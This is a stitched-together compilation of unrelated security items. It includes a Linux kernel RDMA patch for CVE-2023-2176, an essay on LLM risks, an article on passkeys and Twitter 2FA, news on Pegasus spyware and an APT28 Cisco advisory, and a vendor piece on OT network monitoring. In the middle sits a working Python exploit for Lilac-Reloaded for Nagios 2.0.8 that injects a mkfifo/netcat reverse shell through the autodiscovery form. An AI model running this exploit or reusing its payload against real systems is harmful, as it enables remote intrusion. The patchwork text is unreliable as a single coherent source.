A vulnerability was found in compare_netdev_and_ip in drivers/infiniband/core/cma.c in RDMA in the Linux Kernel. The improper cleanup results in out-of-boundary read, where a local user can utilize this problem to crash the system or escalation of privilege.

From: Patrisious Haddad <phaddad@xxxxxxxxxx>

resolve\_prepare\_src() changes the destination address of the id,
regardless of success, and on failure zeroes it out.

Instead on function failure keep the original destination address
of the id.

Since the id could have been already added to the cm id tree and
zeroing its destination address, could result in a key mismatch or
multiple ids having the same key(zero) in the tree which could lead to:

BUG: KASAN: slab-out-of-bounds in compare\_netdev\_and\_ip.isra.0+0x25/0x120 drivers/infiniband/core/cma.c:473
Read of size 4 at addr ffff88800920d9e4 by task syz-executor.4/14865

CPU: 2 PID: 14865 Comm: syz-executor.4 Not tainted 5.19.0-rc2 #21
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014
Call Trace:
 <TASK>
 \_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
 dump\_stack\_lvl+0x6e/0x91 lib/dump\_stack.c:106
 print\_address\_description mm/kasan/report.c:313 \[inline\]
 print\_report.cold+0xff/0x68e mm/kasan/report.c:429
 kasan\_report+0xa8/0x130 mm/kasan/report.c:491
 compare\_netdev\_and\_ip.isra.0+0x25/0x120 drivers/infiniband/core/cma.c:473
 cma\_add\_id\_to\_tree drivers/infiniband/core/cma.c:506 \[inline\]
 rdma\_resolve\_route+0xbc4/0x1560 drivers/infiniband/core/cma.c:3303
 ucma\_resolve\_route+0xe4/0x150 drivers/infiniband/core/ucma.c:746
 ucma\_write+0x19f/0x280 drivers/infiniband/core/ucma.c:1744
 vfs\_write fs/read\_write.c:589 \[inline\]
 vfs\_write+0x181/0x580 fs/read\_write.c:571
 ksys\_write+0x1a1/0x1e0 fs/read\_write.c:644
 do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]
 do\_syscall\_64+0x3d/0x90 arch/x86/entry/common.c:80
 entry\_SYSCALL\_64\_after\_hwframe+0x46/0xb0
RIP: 0033:0x7f2afbe8c89d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 bc ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f2afcf1ec28 EFLAGS: 00000246 ORIG\_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 00007f2afbfabf60 RCX: 00007f2afbe8c89d
RDX: 0000000000000010 RSI: 0000000020000100 RDI: 0000000000000003
RBP: 00007f2afbef910d R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007ffcdc77c66f R14: 00007f2afbfabf60 R15: 00007f2afcf1edc0
 </TASK>

Fixes: 19b752a19dce ("IB/cma: Allow port reuse for rdma\_id")
Signed-off-by: Patrisious Haddad <phaddad@xxxxxxxxxx>
Reviewed-by: Maor Gottlieb <maorg@xxxxxxxxxx>
Reported-by: Wei Chen <harperchen1110@xxxxxxxxx>
Signed-off-by: Leon Romanovsky <leonro@xxxxxxxxxx>
---
 drivers/infiniband/core/cma.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
index 1fca0a24f30f..2d4c391e36a9 100644
--- a/drivers/infiniband/core/cma.c
+++ b/drivers/infiniband/core/cma.c
@@ -3584,8 +3584,11 @@ static int resolve\_prepare\_src(struct rdma\_id\_private \*id\_priv,
 			       struct sockaddr \*src\_addr,
 			       const struct sockaddr \*dst\_addr)
 {
+	struct sockaddr org\_addr = {};
 	int ret;
 
+	memcpy(&org\_addr, cma\_dst\_addr(id\_priv),
+	       rdma\_addr\_size(cma\_dst\_addr(id\_priv)));
 	memcpy(cma\_dst\_addr(id\_priv), dst\_addr, rdma\_addr\_size(dst\_addr));
 	if (!cma\_comp\_exch(id\_priv, RDMA\_CM\_ADDR\_BOUND, RDMA\_CM\_ADDR\_QUERY)) {
 		/\* For a well behaved ULP state will be RDMA\_CM\_IDLE \*/
@@ -3608,7 +3611,7 @@ static int resolve\_prepare\_src(struct rdma\_id\_private \*id\_priv,
 err\_state:
 	cma\_comp\_exch(id\_priv, RDMA\_CM\_ADDR\_QUERY, RDMA\_CM\_ADDR\_BOUND);
 err\_dst:
-	memset(cma\_dst\_addr(id\_priv), 0, rdma\_addr\_size(dst\_addr));
+	memcpy(cma\_dst\_addr(id\_priv), &org\_addr, rdma\_addr\_size(&org\_addr));
 	return ret;
 }
 
-- 
2.38.1

CVE-2023-2176: Fix resolve_prepare_src error cleanup — Linux RDMA and InfiniBand development

Today's LLMs pose too many trust and security risks.

_The Berryville Institute of Machine Learning (BIML) recently attended_ _Calypso AI’s Accelerate AI 2023_ _conference in Washington, DC. The meeting included practitioners from both government and industry, regulators, and academics. I participated in a very timely panel entitled "Emerging Risks and Opportunities of LLMs in the NATSEC and Beyond." That panel spurred this article._

_None of the content in this column was created by an LLM._

Large language models (LLMs) are a kind of machine learning system that has taken the world by storm. ChaptGPT (aka GPT-3.5), an LLM produced and fielded by OpenAI, is one of the most pervasive and popular of the many generative AI models for text. Other generative models include the image generators Dall-E, Midjourney, and Stable Diffusion, and the code generator Copilot.

LLMs and other generative tools present incredible opportunities for applications, and the rush to field such systems is in full gallop. LLMs have the potential to be lots of fun, solve hard problems in science, help with the thorny problems of knowledge management, create interesting content, and most importantly in my view, move the world a little closer to artificial general intelligence (AGI) and a theory of representation that produces massive cognitive science breakthroughs.

But using today's nascent LLMs — and any generative AI tools — comes with real risks.

**Of Parrots and Pollution**

LLMs are trained on massive corpuses of information (300 billion words, mostly scraped from the Internet) and use auto-association to predict the next word in a sentence. As such, most scientists agree that LLMs do not really "understand" anything or do any real thinking. Rather, they are "stochastic parrots," as some researchers call them. LLMs still do generate impressive streams of text, in context, and in an often useful and deeply surprising manner.

Feedback loops are an important class of problem in all kinds of ML models (and one that BIML introduced several years ago as “\[raw:8:looping\]”). Here is what we said at the time:

_Model confounded by subtle feedback loops. If data output from the model are later used as input back into the same model, what happens? Note that this is rumored to have happened to Google translate in the early days when translations of pages made by the machine were used to train the machine itself. Hilarity ensued. To this day, Google restricts some translated search results through its own policies_.

Imagine what will happen when a majority of what can be easily scraped from the Internet is generated by AI models of dubious quality, and then these LLMs start to eat their own tails. Talk about information pollution.

Some AI researchers and information security professionals are already deeply worried about information pollution today, but an infinite spewing information pollution pipeline sounds bad.

**Mansplaining-as-a-Service**

LLMs are very good B.S. artists. These models regularly express incorrect opinions and alternative facts with great confidence, and often make up information to justify their answers in a conversation (including pretend scientific references). Imagine what happens when average knowledge as scraped from the Internet — which includes lots of wrong things — is used to create new content.

The ultimate "reply guy" is not who we need writing news stories for us in the future. Facts actually do matter.

**Mirroring Broken Security**

LLMs are often trained on data that is biased in many ways. Sexist, racist, xenophobic, and misogynistic systems can and will be modeled from data sets originally collected when society was less progressive. Bias is a serious issue in LLMs, and one that operational Band-Aids are unlikely to fix.

**Trusting Deepfakes**

Deepfakes are a side effect of generative AI that has been discussed for some time. Fakes or spoofing are always a risk in security, but the capacity to make higher-quality fakes that are easy to believe is here. There are some obvious worst-case scenarios: moving markets, causing wars, inflaming cultural divides, and so on. Careful where that video came from.

**Automating Everything**

Generative models like LLMs have the capacity to replace lots of jobs, including low-level white collar jobs. Millions of people get plenty of satisfaction out of their jobs, but what if all of those jobs are willy-nilly replaced by ML systems that are cheaper to operate? We already see this with some writing content-creation jobs in local sports stories and marketing copy, for example. Should LLMs be writing our articles? Should they be practicing law? How about doing medical diagnosis?

**Using a Tool for Evil**

Generative AI can create some fun stuff. If you haven’t played with ChapGPT, you should give it a shot. I haven’t had this much fun with new technology since I got my first Apple \]\[+ in 1981, or since Java applets came out in 1995.

But the power of generative AI can be used for evil as well. For example, what if we put ML to the task of designing a novel virus with the propagation capability of COVID and the delayed onset parameters of rabies? Or how about the task of creating a plant with pollen that is also a neurotoxin. If I can think up these dastardly things in my kitchen, what happens when a real evil person starts brainstorming with ML?

Tools have no intrinsic morality or ethics. And for the record, the idea of "protecting prompts" is a pretend solution akin to protecting supercomputer access with command-line filtering.

**Holding Information in a Broken Cup**

Data moats are a thing now. That’s because if an ML model (with the help of humans) can get to your data and learn how to profitably parrot what you do by training on your data, it will. This leads to multiple risks best solved by carefully protecting your data sets instead of cramming them unto an ML model and fielding the model to the general public. In the gold rush world of ML, the gold is data.

Protecting data is harder than it sounds. Think how the government's current information classification system can't always protect classified information. Clearly, protecting sensitive and confidential information is already a huge challenge, so imagine what happens when we intentionally train up our ML systems on confidential information and set them out into the world.

Extraction and transfer attacks exist today, so be careful what you pour in your ML cup.

**What Should We Do About LLM Risk?**

So should we put some kind of magic moratorium on ML research for a few months as some technologists have self-servingly suggested? No, that's just silly. What we need to do is recognize these risks and face them directly.

The good news is that an entire industry is being built around securing ML systems, which I call machine learning security or MLsec. Check out what these new hot startups are building to control ML risk — but do so with a skeptical and well-informed eye.

Expert Insight: Dangers of Using Large Language Models Before They Are Baked

Overcoming the limitations of consumer MFA with a new flavor of passwordless.

Twitter recently disabled SMS-based two-factor authentication (2FA) except for Twitter Blue subscribers. While the intended results may be cost-savings and boosting the number of subscribers, the decision is likely to have unintended security consequences. Even some tech-savvy people who know and care about security find Twitter's 2FA alternatives awkward enough to delay until they are forced into it, so Twitter's new policy will likely result in fewer accounts using 2FA. Educating users about how to set up authenticator apps and security keys is one solution. But that's analogous to building a faster horse.

Fundamentally, the enterprise 2FA playbook cannot be applied to consumer scenarios in equal measure because consumers can vote with their feet. Any added step will send them galloping into the arms of the competition. Thus, the Twitter news should be a call for disruption, and for solutions that protect consumer identities without introducing friction. I believe that technology is passkeys when available uniformly across the digital landscape.

**The State of Consumer MFA**

It’s broadly accepted that any multifactor authentication (MFA) is better than no MFA (I’ll use MFA here to mean authenticating your identity with two or more factors). MFA solutions prevent bad actors from accessing resources using only a victim's primary credentials. Our CISO once observed that MFA and adaptive authentication would have prevented 95% of the breaches she has seen.

But not all MFA is created equal. Some factors are weaker than others, particularly against targeted attacks. Security questions, SMS, voice, and email-based one-time passwords are considered low-assurance factors. All these factors are vulnerable to phishing. Attackers can bypass weaker factors by "guessing" the authenticator code; intercepting the code-containing SMS; or creating "alert fatigue" by bombarding the user with messages until they complete the MFA challenge.

**MFA Bypass Attacks**

Recent research found more than 113 million MFA bypass (registration required) attempts against consumer and SaaS applications over a 90-day period, representing the highest baseline level of attacks of any year on record. Given what we know about weaker factors, you'd be forgiven for thinking Twitter's decision to disable text-based authentication is a good one. But as with most things in identity, there is more complexity that meets the eye, particularly when we look at MFA adoption issues.

**The Trouble With MFA Adoption**

The challenge of getting users to sign up for any form of MFA lies in the technology's origin story. Passwords predate modern online services by thousands of years (just think about "Open, Sesame" in "Ali Baba and the 40 Thieves"). Two-factor authentication entered the picture much later as a way for enterprises and governments to protect their internal systems with something you know (password) and something you have (device, code, or security key).

Technologies developed in an enterprise context have historically prioritized security. The administrator has the power to enforce security measures across the employee base to protect the company's interests. When organizations try to use the same playbook with consumers, they fail, because consumers can vote with their feet. And the impact can quickly become existential.

So, what about authenticator apps? For us in the industry, this might look like the obvious technical alternative to SMS-based methods. But few end users are this digitally savvy. The more likely result of forcing something like an authenticator app or security key at scale is that people just won't use it.

**Phishing-Resistant Authentication**

The transition to phishing-resistant factors offers one potential solution to consumer MFA woes. FIDO and WebAuthn rely on public key cryptography and biometrics to significantly improve both security and the user experience. When using public key cryptography, there are no codes or secrets to be stolen. Users go through a biometric check on their device to unlock access to their private key, which is way faster than entering an SMS code. There are nuances in how biometric data is validated that can make a big difference for data privacy and security.

**The Passkeys Opportunity**

Despite exciting progress toward more secure and usable factors, the best MFA mechanism for consumers really isn't MFA at all — it's passkeys. Passkeys are a FIDO authenticator with the advantage of being backed up to the cloud, so if you lose your device or buy a new one, all you must do is sign into your iCloud or Google Play account to recover your passkeys. Passkeys use public key cryptography and device biometrics, making them resistant to many known attacks, and are easy for the user.

Should passkeys have been used on Twitter? Absolutely, but they may not have been a clear option at the time. Supporting something new is always expensive from the engineering perspective. If passkeys had been an option, the experience for the user might have looked something like this:

1.  The user signs into Twitter on their mobile device with username and password;
2.  They are asked if they would like to use a passkey to authenticate next time; and
3.  The user receives a biometric prompt from then on without needing to install anything. They can even go to their Mac and open Twitter in Safari, and the passkey will be automatically synced to that device.

Offering passkey authentication currently requires some reworking, but it's easier and more cost-effective than SMS. Unfortunately, passkeys are not yet uniformly distributed. Apple added support early on, followed by Android and Chrome. Windows currently supports passkeys on a single device.

Whenever you're asking people to change, you need to take concrete steps to make the transition easier. In the case of Twitter, that would be explaining to users what they can do to change their second factor, to avoid them dropping MFA entirely. This would be an amazing passkey adoption opportunity if the industry were ready. We're already in a fantastic position to encourage people to use this flavor of passwordless. What comes next is making it easier for developers to implement the necessary changes in their apps and websites. A future with fewer passwords may not be so far away after all.

Twitter's 2FA Policy Is a Call for Passkey Disruption

Lilac-Reloaded for Nagios version 2.0.l8 remote code execution exploit.

    #!/usr/bin/env python"""# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)# Google Dork: N/A# Date: 2023-04-13# Exploit Author: max / Zoltan Padanyi# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download# Version: 2.0.8# Tested on: Debian 7.6# CVE : N/AThe autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;Use at your own risk!RCA - wild exec is ongoing without any filteringin library/Net/Traceroute.php   181      function _setTraceroutePath($sysname)   182      {   183          $status    = '';   184          $output    = array();   185          $traceroute_path = '';   186   187          if ("windows" == $sysname) {   188              return "tracert";   189          } else {   190              $traceroute_path = exec("which traceroute", $output, $status);   [...]   257      function traceroute($host)   258      {   259   260          $argList = $this->_createArgList();   261          $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];   262          exec($cmd, $this->_result);"""import requestsimport argparseparser = argparse.ArgumentParser()parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)parser.add_argument("-i", "--ip", help="Listener IP", required=True)parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)args = parser.parse_args()rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}try:    r = requests.get(args.url)    if r.ok:      print("[+] URL looks good...moving forward...")      print("[+] Sending exploit in...")      r = requests.post(args.url,data=body)      if r.ok:        print("[+] Got HTTP 200, check your listener!")    else:      print("[-] Some kind of error happened, check the http response below!")      print(r.text)except Exception as e:  print("General exception: " + str(e))

Lilac-Reloaded For Nagios 2.0.8 Remote Code Execution

Campaigns that wielded NSO Group's Pegasus against high-risk users over a six-month period demonstrate the growing sophistication and relentless nature of spyware actors.

Attackers have been targeting iPhone users around the globe in ongoing Pegasus spyware attacks. They show that cyber-threat actors are targeting both new exploits and older, unupdated devices to circumvent new preventative measures from Apple, researchers have found.

One of the multiple targeted campaigns observed over the last six months involved an iPhone user in the Middle East, and another a journalist in Europe using an iPhone 6 that is not supported by the latest iOS updates, researchers at Jamf Threat Labs reported in a recent blog post. Those updates include new threat "Lockdown Mode" notifications by Apple that can help warn someone if there is unusual activity that could be related to spyware on their devices.

The attacks demonstrate how threat actors continue to evolve and grow in sophistication even as there is more awareness about spyware and prevention against these attacks, which are often used with malicious intent by governments to target dissidents or others who investigate or are unsupportive of policies or regimes, the researchers said.

"Modern spyware is very advanced and, as evidenced by the continued evolution of commercial spyware, continues to leverage zero-day vulnerabilities in both old and new devices to ensure any user can be effectively targeted," the researchers wrote in the post.

They also indicate that though the researchers were able to take a deep dive into devices involved in some of the recent attacks, there is no consistency in terms of how the individuals or organizations targeted investigate attacks after the fact. This makes it difficult to respond or prevent further attacks in a timely or comprehensive way, the researchers said.

Moreover, "not all users impacted by spyware have been contacted by Apple, illustrating the challenges with maintaining a comprehensive list of indicators of compromise (IoCs) and with extracting relevant data remotely," they wrote.

**Mideast Activist Targeted**

Researchers specifically detailed two separate attacks that demonstrate how no iPhone is safe from being targeted, despite Apple's bolstering of preventative measures in its most recent updates to iOS.

One attack targeted an iPhone 12 Pro Max user in the Middle East who eventually was notified by Apple of suspicious activity on the device, which showed IoCs that Pegasus — the notorious spyware from Israel's NSO Group — was running.

Subsequent analysis from Jamf Threat Labs revealed traces of the "libtouchregd" process on the device, which Amnesty International has identified as an IoC associated with Pegasus spyware, the researchers said.

The device also yielded additional IoCs via subsequent analysis of the com.apple.CrashReporter.plist file, which is located within a root folder on iOS and serves as a configuration file for the system daemon, ReportCrash, according to the researchers.

"Under normal operating conditions, applications are not granted permission to access or modify this file," the researchers wrote. "Alteration of this file could potentially impede the reporting of crash report logs to Apple. Additionally, the existence of the file is rare for normal users."

Apple sent a threat notification to the Middle East user late last year that a potential attack was occurring on the device and recommended updating it to iOS 16.2. The user subsequently engaged with security researchers to better understand the attack timeline and details, which resulted in a determination that Pegasus was used in the attack.

"These findings have allowed Jamf Threat Labs to build a more robust profile on a device with 'proven' compromise status," the researchers wrote.

**Targeting an Outdated Device**

Another spyware attack targeted an iPhone 6 — currently unsupported by the latest version of iOS — used by a journalist in Europe working for a global news agency, the researchers reported. The device also showed evidence of system crashes, similar to the phone in the Middle East scenario, that indicated it had been compromised.

However, even more suspiciously, investigators discovered files at an atypical location within iPhone’s strict file system, with one that was "clearly masquerading as a built-in binary," the researchers wrote.

"Based on this path and filename, we have strong reason to believe this may be a new indicator that can be used to assess if a device has been targeted," by a specific threat actor, they wrote. Though they could not conclusively identify the threat actor or the use of Pegasus, they said they notified Apple of a potential new IoC by the actor.

Moreover, an attack on an older device that's clearly unsupported by the latest Apple updates — including its enhanced threat-notification program — demonstrates the relentless nature of spyware actors, the researchers said.

"The continued targeting of older devices, such as the iPhone 6s, serves as a reminder that malicious threat actors will exploit any vulnerabilities in an organization's infrastructure, attacking wherever possible," they wrote.

**Mitigations & Prevention**

Given the advanced and evolving knowledge base around spyware, there are numerous ways that organizations can protect users from being attacks. The latest campaigns demonstrate the most basic mitigation tactic, which is to ensure that all devices are running the most current OS and have all available security patches applied, the researchers said.

At the same time, organizations should practice similar hygiene on the corporate network, keeping all applications — both business oriented and personal — up to date and fully patched, as "mobile application vulnerabilities are easily exploited and frequently overlooked by security teams," the researchers wrote.

Jamf also recommends running security software to monitor for suspicious activity on mobile devices and reporting it alongside all other endpoint monitoring dashboards to ensure they are treated with the same attention and urgency as desktops, laptops, and servers.

Other steps organizations can take to protect users include: monitoring communications for suspicious downloads, command-and-control (C2) indicators, and data exfiltration, and utilizing automated policy controls to block known bad activity before it can cause further damage.

High-risk users also should receive separate education about the symptoms of spyware — such as performance issues and frequent crashes — and be encouraged to use an iPhone's Lockdown Mode if necessary, the researchers said. This protects devices against these extremely rare and highly sophisticated cyberattacks.

Global Spyware Attacks Spotted Against Both New & Old iPhones

Why is Visibility into OT Environments Crucial?
The significance of Operational Technology (OT) for businesses is undeniable as the OT sector flourishes alongside the already thriving IT sector. OT includes industrial control systems, manufacturing equipment, and devices that oversee and manage industrial environments and critical infrastructures. In recent years, adversaries have recognized the

****Why is Visibility into OT Environments Crucial?****

The significance of Operational Technology (OT) for businesses is undeniable as the OT sector flourishes alongside the already thriving IT sector. OT includes industrial control systems, manufacturing equipment, and devices that oversee and manage industrial environments and critical infrastructures. In recent years, adversaries have recognized the lack of detection and protection in many industrial systems and are actively exploiting these vulnerabilities. In response, IT security leaders have become more aware of the need to protect their OT environments with security monitoring and response capabilities. This development was accelerated by severe past cyber incidents targeting critical OT environments and even causing physical damage to infrastructures. Given the pivotal role these systems play in business operations and modern society, ensuring their security is of utmost importance.

The underlying trend is clear: OT and IoT networks are progressively integrated with traditional IT networks for management and access purposes, leading to increased communication between these devices both internally and externally. This not only affects the networks itself but also carries significant ramifications for the security teams responsible for safeguarding the environment. Although this convergence of OT and IT offers numerous benefits, such as enhanced efficiency and reduced operational costs, it also gives rise to new security risks and challenges, rendering OT environments more vulnerable to cyber threats. As evidenced by past attacks, these threats often go undetected due to insufficient security monitoring, allowing threat actors to remain undetected for extended durations. As a result, achieving holistic visibility and effective anomaly detection in OT environments is pivotal for maintaining steadfast security and control.

****What Challenges Arise in Monitoring OT Environments?****

First and foremost, understanding the unique threat landscape of OT environments is crucial. Traditional IT security detection methods fall short in this context, as they require different sensitivity thresholds and more refined monitoring for network segments or device groups, as well as OT-specific detection mechanisms. Unlike IT attacks that focus on data theft, OT attacks typically aim for physical impact. Moreover, as recent examples demonstrate, ransomware in the context of OT is on the rise and directly affects the availability of control systems and safety.

Second, monitoring OT environments requires the consideration of various aspects, such as supplier access management, device management, and network communications. Controlling and overseeing supplier access to OT and IoT networks is challenging, as connections between external and internal networks can occur through various means like VPNs, direct mobile connections, and jump hosts. Another hurdle is device management, which encompasses update mechanisms and protection against unauthorized access or manipulation. Implementing regular updating routines and deploying Endpoint Detection & Response (EDR) on OT and IoT devices is often limited or infeasible. The variety of devices, their life spans, and device-specific operating systems make deploying security software to monitor OT devices difficult and cumbersome.

Third, traditional IT network detection methods require in-depth protocol knowledge, which, in the OT context, includes a wide range of different protocols and attack scenarios absent in traditional rule sets. OT network devices connect IoT sensors and machines using communication protocols uncommon in traditional IT networks. In terms of more intrusive security solutions, active vulnerability scanning methods can also be problematic in OT environments, as they may cause disruptions or even outages. The same applies to Intrusion Prevention Systems (IPS) because they could block network packets, impacting stability and business continuity in OT environments. As a result, passive network detection systems like Network Detection & Response (NDR) solutions are better suited for this purpose.

****How Can I Effectively Monitor and Secure My OT Environment?****

While secure access management and device lifecycle management are essential, their seamless implementation can be incredibly challenging. In this context, Network Detection and Response (NDR) solutions offer a non-intrusive and effective approach to monitoring OT environments. By focusing on communication patterns for OT devices, the intersection between IT and OT, and third-party access to OT networks, NDR systems provide comprehensive visibility and detection capabilities without disrupting industrial operations and business processes.

In particular, NDR solutions with advanced baselining capabilities excel at identifying new and unusual communication patterns that could indicate malicious activities within OT networks. Utilizing flow information for baselining, these NDR systems provide protocol and device-independent anomaly detection by learning who communicates with whom and at what frequency. Instead of manually configuring these parameters, the NDR learns the baseline and alerts the security teams on unusual requests or changes in the frequency. In addition, a flexible use case framework allows setting fine-tuned thresholds for OT-specific monitoring, including the ability to set load monitoring with network zone-specific granularity. Moreover, the use of Machine Learning algorithms allows for more accurate detection of anomalies and potential threats compared to traditional rule-based systems.

As a result, the passive monitoring capabilities of NDR solutions are vital for OT and IoT environments, where alternative monitoring methods may be difficult to implement or cause disruptions. ExeonTrace, a particularly robust and easy-to-implement ML-driven NDR system for OT environments, analyzes log data from traditional IT environments, OT networks, and jump host gateways, to provide a comprehensive and holistic view of network activity. Therein, the flexibility of integrating various third-party log sources, such as OT-specific logs, is crucial. Moreover, ExeonTrace's ability to integrate with other OT-specific detection platforms enhances its capabilities and ensures extensive security coverage.

ExeonTrace Platform: OT Network Visibility

In summary, NDR solutions like ExeonTrace effectively address the distinct challenges of OT monitoring, establishing the Swiss NDR system as the favored detection approach for safeguarding OT environments. By implementing ML-driven NDR systems like ExeonTrace, organizations can reliably monitor and secure their industrial operations, ensuring business continuity through an automated, efficient, and hardware-free approach. Find out if ExeonTrace is the ideal solution for your business and request a demo today.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Beyond Traditional Security: NDR's Pivotal Role in Safeguarding OT Networks

Israeli spyware maker NSO Group deployed at least three novel "zero-click" exploits against iPhones in 2022 to infiltrate defenses erected by Apple and deploy Pegasus, according to the latest findings from Citizen Lab.
"NSO Group customers widely deployed at least three iOS 15 and iOS 16 zero-click exploit chains against civil society targets around the world," the interdisciplinary laboratory

Israeli spyware maker NSO Group deployed at least three novel "zero-click" exploits against iPhones in 2022 to infiltrate defenses erected by Apple and deploy Pegasus, according to the latest findings from Citizen Lab.

"NSO Group customers widely deployed at least three iOS 15 and iOS 16 zero-click exploit chains against civil society targets around the world," the interdisciplinary laboratory based at the University of Toronto said.

NSO Group is the manufacturer of Pegasus, a sophisticated cyber weapon that's capable of extracting sensitive information stored in a device – e.g., messages, locations, photos, and call logs, among others — in real-time. It's typically delivered to targeted iPhones using zero-click and/or zero-day exploits.

While it has been pitched as a tool for law enforcement agencies to combat serious crimes such as child sexual abuse and terrorism, it has also been deployed illegally by authoritarian governments to spy on human rights defenders, democracy advocates, journalists, dissidents, and others.

The misuse of Pegasus prompted the U.S. government to add NSO Group to its trade blocklist in late 2021, with Apple filing a lawsuit of its own against the company for targeting its users.

In July 2022, it emerged that the spyware was used against Thai activists involved in the country's pro-democracy protests between October 2020 and November 2021 using two zero-click exploits named KISMET and FORCEDENTRY.

Two of the targets of the latest campaign unearthed by Citizen Lab include human rights defenders from Centro PRODH, which represents victims of the Mexican Army's extrajudicial killings and disappearances. The intrusions occurred in June 2022.

This entailed the use of three disparate exploit chains dubbed LATENTIMAGE, FINDMYPWN, and PWNYOURHOME that weaponized various flaws in iOS 15 and iOS 16 as zero-days to penetrate the devices and ultimately launch Pegasus -

*   **LATENTIMAGE** (iOS version 15.1.1, detected in January 2022) - An exploit that's suspected to involve the iPhone's Find My feature and SpringBoard
*   **FINDMYPWN** (iOS versions 15.5 and 15.6, detected in June 2022) - A two-phase exploit that makes use of Find My functionality and iMessage
*   **PWNYOURHOME** (iOS version 16.0.3, detected in October 2022) - A two-phase exploit that combines the HomeKit functionality built into iPhones and iMessage to bypass BlastDoor protections

In an encouraging sign, Citizen Lab said it found evidence of Lockdown Mode stepping in to block an attempted PWNYOURHOME attack, warning users that it blocked unknown parties with Gmail and Yahoo! accounts from trying to "access a Home."

The development marks the first publicly documented instance where Lockdown Mode, which is designed to reduce the iPhone's attack surface, has successfully protected someone from a compromise.

That said, Citizen Lab pointed out that NSO Group "may have figured out a way to correct the notification issue, such as by fingerprinting Lockdown Mode." Apple has since shipped several security improvements to HomeKit in iOS 16.3.1 and sent out notifications to targeted victims in November and December 2022, and March 2023.

The findings are the latest example of NSO's evolving attack techniques to break into iPhones without requiring any targets to take any action to trigger the infection.

They also coincide with a new investigation from the New York Times uncovering Mexico's use of Pegasus to target human rights defenders in recent months, detailing how the country became the first and most prolific user of the spyware.

In yet another indication of the pervasive nature of such campaigns, Jamf Threat Labs uncovered evidence of a human rights activist based in the Middle East as well as a Hungarian journalist being targeted with spyware. Their names were not disclosed.

UPCOMING WEBINAR

Defend with Deception: Advancing Zero Trust Security

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

The attack targeting the journalist's iPhone is also significant for the fact that the device was an iPhone 6s, which is no longer compatible with the latest iOS version, indicating threat actors' penchant for exploiting known and unknown vulnerabilities to meet their goals.

While Apple does back-port fixes for critical flaws to older devices (the current version supported by iPhone 6s is iOS 15.7.5), it's important to note that not all vulnerabilities are addressed for legacy devices.

"As a result, threat actors can continue to exploit unpatched vulnerabilities that have been patched on newer supported devices, potentially giving attackers more time and more information to gain remote access to targeted devices," Jamf said.

To safeguard against spyware attacks, it's recommended to apply the latest operating system updates, upgrade outdated devices to newer iPhone or iPad models, and consider enabling Lockdown Mode.

The U.K. National Cyber Security Centre (NCSC), in an advisory released on April 19, 2023, cautioned the "proliferation of commercial cyber tools will pose a growing threat to organizations and individuals globally."

"The commercial proliferation of cyber tools and services lowers the barrier to entry to state and non-state actors in obtaining capability and intelligence that they would not otherwise be able to develop or acquire," the agency said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

NSO Group Used 3 Zero-Click iPhone Exploits Against Human Rights Defenders

Categories: Exploits and vulnerabilities
Categories: News
Tags: APT28

Tags:  Sofacy

Tags:  Fancy Bear

Tags:  GRU

Tags:  Cisco

Tags:  CVE--2017-6742

Tags:  SNMP

Tags:  Jaguar Tooth

A joint advisory about a Cisco vulnerability by several US and UK agencies gives us a peek inside the minds of ideologically motivated cybercriminals



(Read more...)




The post Fancy Bear known to be exploiting vulnerability in Cisco routers appeared first on Malwarebytes Labs.

In a joint advisory, the UK National Cyber Security Centre (NCSC), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have released information about APT28’s exploitation of Cisco routers in 2021.

Now please don’t stop reading because you think this is old news. If you think 2021 is long ago, maybe you will be surprised to learn that the vulnerability used in these attacks was actually discovered in 2017.

Cisco published workarounds and updates for this vulnerability in June of 2017. Nevertheless, the advisory says that the mentioned tactics, techniques, and procedures (TTPs) may still be being used against vulnerable Cisco devices.

APT28 (also known as Sofacy and Fancy Bear), is the name for an advanced group of cybercriminals of Russian origin which are commonly believed to be part of the Russian Staff Main Intelligence Directorate (GRU). Previous activities include cyberattacks against the German parliament in 2015, and an attempted attack against the Organization for the Prohibition of Chemical Weapons (OPCW) in April 2018, to disrupt independent analysis of chemicals weaponized by the GRU in the UK.

The Simple Network Management Protocol (SNMP) is an application-layer protocol that provides a standardized framework and a common language for monitoring and managing devices in a network. SNMP is designed to allow network administrators to monitor and configure network devices remotely, but it can also be abused to obtain sensitive network information and, if vulnerable, exploit devices to penetrate a network. In 2021, APT28 used infrastructure to masquerade SNMP access into Cisco routers worldwide.

